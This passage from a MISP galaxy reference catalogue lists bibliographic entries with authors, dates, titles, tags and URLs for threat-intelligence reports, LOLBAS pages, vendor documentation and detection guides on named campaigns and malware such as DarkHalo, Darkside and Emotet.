Kaspersky Tomiris Sep 2021

Kwiatkoswki, I. and Delcher, P. (2021, September 29). DarkHalo After SolarWinds: the Tomiris connection. Retrieved December 27, 2021.

The tag is: misp-galaxy:references="Kaspersky Tomiris Sep 2021"

Table 13255. Table References

Links

https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/

Volexity SolarWinds

Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.

The tag is: misp-galaxy:references="Volexity SolarWinds"

Table 13256. Table References

Links

https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/

Securelist Darkhotel Aug 2015

Kaspersky Lab’s Global Research & Analysis Team. (2015, August 10). Darkhotel’s attacks in 2015. Retrieved November 2, 2018.

The tag is: misp-galaxy:references="Securelist Darkhotel Aug 2015"

Table 13257. Table References

Links

https://securelist.com/darkhotels-attacks-in-2015/71713/

Unit42 DarkHydrus Jan 2019

Lee, B., Falcone, R. (2019, January 18). DarkHydrus delivers new Trojan that can use Google Drive for C2 communications. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="Unit42 DarkHydrus Jan 2019"

Table 13258. Table References

Links

https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/

Unit 42 Phishery Aug 2018

Falcone, R. (2018, August 07). DarkHydrus Uses Phishery to Harvest Credentials in the Middle East. Retrieved August 10, 2018.

The tag is: misp-galaxy:references="Unit 42 Phishery Aug 2018"

Table 13259. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/08/unit42-darkhydrus-uses-phishery-harvest-credentials-middle-east/

Darkside Ransomware Cybereason

Cybereason Nocturnus. (2021, April 1). Cybereason vs. Darkside Ransomware. Retrieved August 18, 2021.

The tag is: misp-galaxy:references="Darkside Ransomware Cybereason"

Table 13260. Table References

Links

https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware

DarkSide Ransomware Gang

Ramarcus Baylor. (2021, May 12). DarkSide Ransomware Gang: An Overview. Retrieved August 30, 2022.

The tag is: misp-galaxy:references="DarkSide Ransomware Gang"

Table 13261. Table References

Links

https://unit42.paloaltonetworks.com/darkside-ransomware/

Secureworks DarkTortilla Aug 2022

Secureworks Counter Threat Unit Research Team. (2022, August 17). DarkTortilla Malware Analysis. Retrieved November 3, 2022.

The tag is: misp-galaxy:references="Secureworks DarkTortilla Aug 2022"

Table 13262. Table References

Links

https://www.secureworks.com/research/darktortilla-malware-analysis

Securelist DarkVishnya Dec 2018

Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020.

The tag is: misp-galaxy:references="Securelist DarkVishnya Dec 2018"

Table 13263. Table References

Links

https://securelist.com/darkvishnya/89169/

Prevailion DarkWatchman 2021

Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.

The tag is: misp-galaxy:references="Prevailion DarkWatchman 2021"

Table 13264. Table References

Links

https://www.prevailion.com/darkwatchman-new-fileless-techniques/

Moran 2014

Moran, N., Oppenheim, M., Engle, S., & Wartell, R. (2014, September 3). Darwin’s Favorite APT Group [Blog]. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Moran 2014"

Table 13265. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html

DataSvcUtil.exe - LOLBAS Project

LOLBAS. (2020, December 1). DataSvcUtil.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="DataSvcUtil.exe - LOLBAS Project"

Table 13266. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/

Hijacking VNC

Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute, Access and Crack). Retrieved September 20, 2021.

The tag is: misp-galaxy:references="Hijacking VNC"

Table 13267. Table References

Links

https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc

Microsoft COM ACL

Microsoft. (n.d.). DCOM Security Enhancements in Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1. Retrieved November 22, 2017.

The tag is: misp-galaxy:references="Microsoft COM ACL"

Table 13268. Table References

Links

https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1

DCShadow Blog

Delpy, B. & LE TOUX, V. (n.d.). DCShadow. Retrieved March 20, 2018.

The tag is: misp-galaxy:references="DCShadow Blog"

Table 13269. Table References

Links

https://www.dcshadow.com/

GitHub DCSYNCMonitor

Spencer S. (2018, February 22). DCSYNCMonitor. Retrieved March 30, 2018.

The tag is: misp-galaxy:references="GitHub DCSYNCMonitor"

Table 13270. Table References

Links

https://github.com/shellster/DCSYNCMonitor

DD Man

Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="DD Man"

Table 13271. Table References

Links

http://man7.org/linux/man-pages/man1/dd.1.html

Arbor SSLDoS April 2012

ASERT Team, Netscout Arbor. (2012, April 24). DDoS Attacks on SSL: Something Old, Something New. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Arbor SSLDoS April 2012"

Table 13272. Table References

Links

https://www.netscout.com/blog/asert/ddos-attacks-ssl-something-old-something-new

CERT-EU DDoS March 2017

Meintanis, S., Revuelto, V., Socha, K. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019.

The tag is: misp-galaxy:references="CERT-EU DDoS March 2017"

Table 13273. Table References

Links

http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf

Unit42 Sofacy Dec 2018

Lee, B., Falcone, R. (2018, December 12). Dear Joohn: The Sofacy Group’s Global Campaign. Retrieved April 19, 2019.

The tag is: misp-galaxy:references="Unit42 Sofacy Dec 2018"

Table 13274. Table References

Links

https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/

Death by 1000 installers; it’s all broken!

Patrick Wardle. (2017). Death by 1000 installers; it’s all broken! Retrieved August 8, 2019.

The tag is: misp-galaxy:references="Death by 1000 installers; it’s all broken!"

Table 13275. Table References

Links

https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8

SpecterOps Lateral Movement from Azure to On-Prem AD 2020

Andy Robbins. (2020, August 17). Death from Above: Lateral Movement from Azure to On-Prem AD. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="SpecterOps Lateral Movement from Azure to On-Prem AD 2020"

Table 13276. Table References

Links

https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d

Microsoft PowerShell SilentlyContinue

Microsoft. (2023, March 2). $DebugPreference. Retrieved August 30, 2023.

The tag is: misp-galaxy:references="Microsoft PowerShell SilentlyContinue"

Table 13277. Table References

Links

https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_preference_variables?view=powershell-7.3#debugpreference

virtualization.info 2006

virtualization.info. (Interviewer) & Liguori, A. (Interviewee). (2006, August 11). Debunking Blue Pill myth [Interview transcript]. Retrieved November 13, 2014.

The tag is: misp-galaxy:references="virtualization.info 2006"

Table 13278. Table References

Links

http://virtualization.info/en/news/2006/08/debunking-blue-pill-myth.html

TrendMicro Confucius APT Feb 2018

Lunghi, D and Horejsi, J. (2018, February 13). Deciphering Confucius: A Look at the Group’s Cyberespionage Operations. Retrieved December 26, 2021.

The tag is: misp-galaxy:references="TrendMicro Confucius APT Feb 2018"

Table 13279. Table References

Links

https://www.trendmicro.com/en_us/research/18/b/deciphering-confucius-cyberespionage-operations.html

Ciberseguridad Decoding malicious RTF files

Pedrero, R. (2021, July). Decoding malicious RTF files. Retrieved November 16, 2021.

The tag is: misp-galaxy:references="Ciberseguridad Decoding malicious RTF files"

Table 13280. Table References

Links

https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/

Nccgroup Gh0st April 2018

Pantazopoulos, N. (2018, April 17). Decoding network data from a Gh0st RAT variant. Retrieved November 2, 2018.

The tag is: misp-galaxy:references="Nccgroup Gh0st April 2018"

Table 13281. Table References

Links

https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/

MalwareBytes Template Injection OCT 2017

Segura, J. (2017, October 13). Decoy Microsoft Word document delivers malware through a RAT. Retrieved July 21, 2018.

The tag is: misp-galaxy:references="MalwareBytes Template Injection OCT 2017"

Table 13282. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/

Crowdstrike PartyTicket March 2022

Crowdstrike. (2022, March 1). Decryptable PartyTicket Ransomware Reportedly Targeting Ukrainian Entities. Retrieved March 1, 2022.

The tag is: misp-galaxy:references="Crowdstrike PartyTicket March 2022"

Table 13283. Table References

Links

https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine

Fortinet Emotet May 2017

Xiaopeng Zhang. (2017, May 3). Deep Analysis of New Emotet Variant – Part 1. Retrieved April 1, 2019.

The tag is: misp-galaxy:references="Fortinet Emotet May 2017"

Table 13284. Table References

Links

https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-1.html

Aqua TeamTNT August 2020

Kol, R., Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Aqua TeamTNT August 2020"

Table 13285. Table References

Links

https://blog.aquasec.com/container-security-tnt-container-attack

Bitdefender FIN8 July 2021

Martin Zugec. (2021, July 27). Deep Dive Into a FIN8 Attack - A Forensic Investigation. Retrieved September 1, 2021.

The tag is: misp-galaxy:references="Bitdefender FIN8 July 2021"

Table 13286. Table References

Links

https://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation

Sophos Pikabot June 12 2023

Karl Ackerman. (2023, June 12). Deep dive into the Pikabot cyber threat. Retrieved January 11, 2024.

The tag is: misp-galaxy:references="Sophos Pikabot June 12 2023"

Table 13287. Table References

Links

https://news.sophos.com/en-us/2023/06/12/deep-dive-into-the-pikabot-cyber-threat/

Microsoft Deep Dive Solorigate January 2021

MSTIC, CDOC, 365 Defender Research Team. (2021, January 20). Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop. Retrieved January 22, 2021.

The tag is: misp-galaxy:references="Microsoft Deep Dive Solorigate January 2021"

Table 13288. Table References

Links

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

AADInternals - Device Registration

Dr. Nestori Syynimaa. (2021, March 3). Deep-dive to Azure AD device join. Retrieved March 9, 2022.

The tag is: misp-galaxy:references="AADInternals - Device Registration"

Table 13289. Table References

Links

https://o365blog.com/post/devices/

Alperovitch 2014

Alperovitch, D. (2014, July 7). Deep in Thought: Chinese Targeting of National Security Think Tanks. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Alperovitch 2014"

Table 13290. Table References

Links

https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/

DefaultPack.EXE - LOLBAS Project

LOLBAS. (2020, October 1). DefaultPack.EXE. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="DefaultPack.EXE - LOLBAS Project"

Table 13291. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/

Lastline DarkHotel Just In Time Decryption Nov 2015

Arunpreet Singh, Clemens Kolbitsch. (2015, November 5). Defeating Darkhotel Just-In-Time Decryption. Retrieved April 15, 2021.

The tag is: misp-galaxy:references="Lastline DarkHotel Just In Time Decryption Nov 2015"

Table 13292. Table References

Links

https://www.lastline.com/labsblog/defeating-darkhotel-just-in-time-decryption/

piazza launch agent mitigation

Antonio Piazza (4n7m4n). (2021, November 23). Defeating Malicious Launch Persistence. Retrieved April 19, 2022.

The tag is: misp-galaxy:references="piazza launch agent mitigation"

Table 13293. Table References

Links

https://antman1p-30185.medium.com/defeating-malicious-launch-persistence-156e2b40fc67

VectorSec ForFiles Aug 2017

vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles? Retrieved January 22, 2018.

The tag is: misp-galaxy:references="VectorSec ForFiles Aug 2017"

Table 13294. Table References

Links

https://twitter.com/vector_sec/status/896049052642533376

Black Hat 2015 App Shim

Pierce, Sean. (2015, November). Defending Against Malicious Application Compatibility Shims. Retrieved June 22, 2017.

The tag is: misp-galaxy:references="Black Hat 2015 App Shim"

Table 13295. Table References

Links

https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf

TechNet O365 Outlook Rules

Koeller, B. (2018, February 21). Defending Against Rules and Forms Injection. Retrieved November 5, 2019.

The tag is: misp-galaxy:references="TechNet O365 Outlook Rules"

Table 13296. Table References

Links

https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/

Defending Against Scheduled Task Attacks in Windows Environments

Harshal Tupsamudre. (2022, June 20). Defending Against Scheduled Tasks. Retrieved July 5, 2022.

The tag is: misp-galaxy:references="Defending Against Scheduled Task Attacks in Windows Environments"

Table 13297. Table References

Links

https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments

Rapid7 HAFNIUM Mar 2021

Eoin Miller. (2021, March 23). Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange. Retrieved October 27, 2022.

The tag is: misp-galaxy:references="Rapid7 HAFNIUM Mar 2021"

Table 13298. Table References

Links

https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/

Microsoft SQL Server

Microsoft Threat Intelligence. (2023, October 3). Defending new vectors: Threat actors attempt SQL Server to cloud lateral movement. Retrieved October 3, 2023.

The tag is: misp-galaxy:references="Microsoft SQL Server"

Table 13299. Table References

Links

https://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/

rundll32.exe defense evasion

Ariel Silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022.

The tag is: misp-galaxy:references="rundll32.exe defense evasion"

Table 13300. Table References

Links

https://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/

def_ev_win_event_logging

Chandel, R. (2021, April 22). Defense Evasion: Windows Event Logging (T1562.002). Retrieved September 14, 2021.

The tag is: misp-galaxy:references="def_ev_win_event_logging"

Table 13301. Table References

Links

https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/

Kaspersky DeftTorero October 3 2022

Global Research & Analysis Team. (2022, October 3). DeftTorero: tactics, techniques and procedures of intrusions revealed. Retrieved October 25, 2023.

The tag is: misp-galaxy:references="Kaspersky DeftTorero October 3 2022"

Table 13302. Table References

Links

https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/

TechNet Del

Microsoft. (n.d.). Del. Retrieved April 22, 2016.

The tag is: misp-galaxy:references="TechNet Del"

Table 13303. Table References

Links

https://technet.microsoft.com/en-us/library/cc771049.aspx

Azure Shared Access Signature

Delegate access with a shared access signature. (2019, December 18). Delegate access with a shared access signature. Retrieved March 2, 2022.

The tag is: misp-galaxy:references="Azure Shared Access Signature"

Table 13304. Table References

Links

https://docs.microsoft.com/en-us/rest/api/storageservices/delegate-access-with-shared-access-signature

Register Deloitte

Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Register Deloitte"

Table 13305. Table References

Links

https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/

Talos Micropsia June 2017

Rascagneres, P., Mercer, W. (2017, June 19). Delphi Used To Score Against Palestine. Retrieved November 13, 2018.

The tag is: misp-galaxy:references="Talos Micropsia June 2017"

Table 13306. Table References

Links

https://blog.talosintelligence.com/2017/06/palestine-delphi.html

TrendMicro EarthLusca 2022

Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.

The tag is: misp-galaxy:references="TrendMicro EarthLusca 2022"

Table 13307. Table References

Links

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf

Demiguise Guardrail Router Logo

Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019.

The tag is: misp-galaxy:references="Demiguise Guardrail Router Logo"

Table 13308. Table References

Links

https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js

FireEye Hacking Team

FireEye Threat Intelligence. (2015, July 13). Demonstrating Hustle, Chinese APT Groups Quickly Use Zero-Day Vulnerability (CVE-2015-5119) Following Hacking Team Leak. Retrieved January 25, 2016.

The tag is: misp-galaxy:references="FireEye Hacking Team"

Table 13309. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html

Demystifying Azure AD Service Principals

Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service Principals. Retrieved January 19, 2020.

The tag is: misp-galaxy:references="Demystifying Azure AD Service Principals"

Table 13310. Table References

Links

https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/

demystifying_ryuk

Tran, T. (2020, November 24). Demystifying Ransomware Attacks Against Microsoft Defender Solution. Retrieved January 26, 2022.

The tag is: misp-galaxy:references="demystifying_ryuk"

Table 13311. Table References

Links

https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947

DOJ Iran Indictments September 2020

DOJ. (2020, September 17). Department of Justice and Partner Departments and Agencies Conduct Coordinated Actions to Disrupt and Deter Iranian Malicious Cyber Activities Targeting the United States and the Broader International Community. Retrieved December 10, 2020.

The tag is: misp-galaxy:references="DOJ Iran Indictments September 2020"

Table 13312. Table References

Links

https://www.justice.gov/opa/pr/department-justice-and-partner-departments-and-agencies-conduct-coordinated-actions-disrupt

Microsoft GitHub Device Guard CI Policies

Microsoft. (2017, June 16). Deploy code integrity policies: steps. Retrieved June 28, 2017.

The tag is: misp-galaxy:references="Microsoft GitHub Device Guard CI Policies"

Table 13313. Table References

Links

https://github.com/Microsoft/windows-itpro-docs/blob/master/windows/device-security/device-guard/deploy-code-integrity-policies-steps.md

Microsoft Deploying AD Federation

Microsoft. (n.d.). Deploying Active Directory Federation Services in Azure. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="Microsoft Deploying AD Federation"

Table 13314. Table References

Links

https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs

Apple Kernel Extension Deprecation

Apple. (n.d.). Deprecated Kernel Extensions and System Extension Alternatives. Retrieved November 4, 2020.

The tag is: misp-galaxy:references="Apple Kernel Extension Deprecation"

Table 13315. Table References

Links

https://developer.apple.com/support/kernel-extensions/

Amazon Describe Instance

Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.

The tag is: misp-galaxy:references="Amazon Describe Instance"

Table 13316. Table References

Links

https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html

Amazon Describe Instances API

Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.

The tag is: misp-galaxy:references="Amazon Describe Instances API"

Table 13317. Table References

Links

https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html

DescribeSecurityGroups - Amazon Elastic Compute Cloud

Amazon Web Services, Inc. (2022). DescribeSecurityGroups. Retrieved January 28, 2022.

The tag is: misp-galaxy:references="DescribeSecurityGroups - Amazon Elastic Compute Cloud"

Table 13318. Table References

Links

https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSecurityGroups.html

Microsoft RunOnceEx APR 2018

Microsoft. (2018, August 20). Description of the RunOnceEx Registry Key. Retrieved June 29, 2018.

The tag is: misp-galaxy:references="Microsoft RunOnceEx APR 2018"

Table 13319. Table References

Links

https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key

Designing Daemons Apple Dev

Apple. (n.d.). Retrieved October 12, 2021.

The tag is: misp-galaxy:references="Designing Daemons Apple Dev"

Table 13320. Table References

Links

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html

Desk.cpl - LOLBAS Project

LOLBAS. (2022, April 21). Desk.cpl. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Desk.cpl - LOLBAS Project"

Table 13321. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Desk/

Free Desktop Application Autostart Feb 2006

Free Desktop. (2006, February 13). Desktop Application Autostart Specification. Retrieved September 12, 2019.

The tag is: misp-galaxy:references="Free Desktop Application Autostart Feb 2006"

Table 13322. Table References

Links

https://specifications.freedesktop.org/autostart-spec/autostart-spec-latest.html

Desktopimgdownldr.exe - LOLBAS Project

LOLBAS. (2020, June 28). Desktopimgdownldr.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Desktopimgdownldr.exe - LOLBAS Project"

Table 13323. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Desktopimgdownldr/

CISA AA22-057A Destructive Malware February 2022

CISA. (2022, February 26). Destructive Malware Targeting Organizations in Ukraine. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="CISA AA22-057A Destructive Malware February 2022"

Table 13324. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa22-057a

Microsoft WhisperGate January 2022

MSTIC. (2022, January 15). Destructive malware targeting Ukrainian organizations. Retrieved March 10, 2022.

The tag is: misp-galaxy:references="Microsoft WhisperGate January 2022"

Table 13325. Table References

Links

https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/

NSA and ASD Detect and Prevent Web Shells 2020

NSA and ASD. (2020, April 3). Detect and Prevent Web Shell Malware. Retrieved July 23, 2021.

The tag is: misp-galaxy:references="NSA and ASD Detect and Prevent Web Shells 2020"

Table 13326. Table References

Links

https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF

Microsoft Detect Outlook Forms

Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook Rules and Custom Forms Injections Attacks in Office 365. Retrieved February 4, 2019.

The tag is: misp-galaxy:references="Microsoft Detect Outlook Forms"

Table 13327. Table References

Links

https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack

ADDSecurity DCShadow Feb 2018

Lucand, G. (2018, February 18). Detect DCShadow, impossible?. Retrieved March 30, 2018.

The tag is: misp-galaxy:references="ADDSecurity DCShadow Feb 2018"

Table 13328. Table References

Links

https://adds-security.blogspot.fr/2018/02/detecter-dcshadow-impossible.html

Pace University Detecting DGA May 2017

Chen, L., Wang, T. (2017, May 5). Detecting Algorithmically Generated Domains Using Data Visualization and N-Grams Methods. Retrieved April 26, 2019.

The tag is: misp-galaxy:references="Pace University Detecting DGA May 2017"

Table 13329. Table References

Links

http://csis.pace.edu/ctappert/srd2017/2017PDF/d4.pdf

MDSec Detecting DOTNET

MDSec Research. (n.d.). Detecting and Advancing In-Memory .NET Tradecraft. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="MDSec Detecting DOTNET"

Table 13330. Table References

Links

https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/

Cisco DoSdetectNetflow

Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.

The tag is: misp-galaxy:references="Cisco DoSdetectNetflow"

Table 13331. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

RSA2017 Detect and Respond Adair

Adair, S. (2017, February 17). Detecting and Responding to Advanced Threats within Exchange Environments. Retrieved March 20, 2017.

The tag is: misp-galaxy:references="RSA2017 Detect and Respond Adair"

Table 13332. Table References

Links

https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/5009/HTA-F02-Detecting-and-Responding-to-Advanced-Threats-within-Exchange-Environments.pdf

Nmap Firewalls NIDS

Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls and Intrusion Detection Systems. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Nmap Firewalls NIDS"

Table 13333. Table References

Links

https://nmap.org/book/firewalls.html

Medium Detecting Attempts to Steal Passwords from Memory

French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.

The tag is: misp-galaxy:references="Medium Detecting Attempts to Steal Passwords from Memory"

Table 13334. Table References

Links

https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea

Endurant CMSTP July 2018

Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon. Retrieved August 6, 2018.

The tag is: misp-galaxy:references="Endurant CMSTP July 2018"

Table 13335. Table References

Links

http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/

Red Canary COR_PROFILER May 2020

Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation for persistence. Retrieved June 24, 2020.

The tag is: misp-galaxy:references="Red Canary COR_PROFILER May 2020"

Table 13336. Table References

Links

https://redcanary.com/blog/cor_profiler-for-persistence/

NVisio Labs DDE Detection Oct 2017

NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="NVisio Labs DDE Detection Oct 2017"

Table 13337. Table References

Links

https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/

Zhang 2013

Zhang, H., Papadopoulos, C., & Massey, D. (2013, April). Detecting encrypted botnet traffic. Retrieved August 19, 2015.

The tag is: misp-galaxy:references="Zhang 2013"

Table 13338. Table References

Links

http://www.netsec.colostate.edu/zhang/DetectingEncryptedBotnetTraffic.pdf

ADSecurity Detecting Forged Tickets

Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.

The tag is: misp-galaxy:references="ADSecurity Detecting Forged Tickets"

Table 13339. Table References

Links

https://adsecurity.org/?p=1515

Microsoft Detecting Kerberoasting Feb 2018

Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.

The tag is: misp-galaxy:references="Microsoft Detecting Kerberoasting Feb 2018"

Table 13340. Table References

Links

https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/

Medium Detecting Lateral Movement

French, D. (2018, September 30). Detecting Lateral Movement Using Sysmon and Splunk. Retrieved October 11, 2019.

The tag is: misp-galaxy:references="Medium Detecting Lateral Movement"

Table 13341. Table References

Links

https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc

macOS root VNC login without authentication

Nick Miles. (2017, November 30). Detecting macOS High Sierra root account without authentication. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="macOS root VNC login without authentication"

Table 13342. Table References

Links

https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication

Sans Virtual Jan 2016

Keragala, D. (2016, January 16). Detecting Malware and Sandbox Evasion Techniques. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="Sans Virtual Jan 2016"

Table 13343. Table References

Links

https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667

Mandiant Azure AD Backdoors

Mike Burns. (2020, September 30). Detecting Microsoft 365 and Azure Active Directory Backdoors. Retrieved September 28, 2022.

The tag is: misp-galaxy:references="Mandiant Azure AD Backdoors"

Table 13344. Table References

Links

https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors

CounterCept PPID Spoofing Dec 2018

Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved June 3, 2019.

The tag is: misp-galaxy:references="CounterCept PPID Spoofing Dec 2018"

Table 13345. Table References

Links

https://www.countercept.com/blog/detecting-parent-pid-spoofing/

CISA SolarWinds Cloud Detection

CISA. (2021, January 8). Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments. Retrieved January 8, 2021.

The tag is: misp-galaxy:references="CISA SolarWinds Cloud Detection"

Table 13346. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa21-008a

Detecting Rclone

Aaron Greetham. (2021, May 27). Detecting Rclone – An Effective Tool for Exfiltration. Retrieved August 30, 2022.

The tag is: misp-galaxy:references="Detecting Rclone"

Table 13347. Table References

Links

https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/

Medium Detecting WMI Persistence

French, D. (2018, October 9). Detecting & Removing an Attacker’s WMI Persistence. Retrieved October 11, 2019.

The tag is: misp-galaxy:references="Medium Detecting WMI Persistence"

Table 13348. Table References

Links

https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96

Okta Scatter Swine 2022

Okta. (2022, August 25). Detecting Scatter Swine: Insights into a Relentless Phishing Campaign. Retrieved February 24, 2023.

The tag is: misp-galaxy:references="Okta Scatter Swine 2022"

Table 13349. Table References

Links

https://sec.okta.com/scatterswine

Splunk Supernova Jan 2021

Stoner, J. (2021, January 21). Detecting Supernova Malware: SolarWinds Continued. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="Splunk Supernova Jan 2021"

Table 13350. Table References

Links

https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html

Microsoft Winnti Jan 2017

Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017.

The tag is: misp-galaxy:references="Microsoft Winnti Jan 2017"

Table 13351. Table References

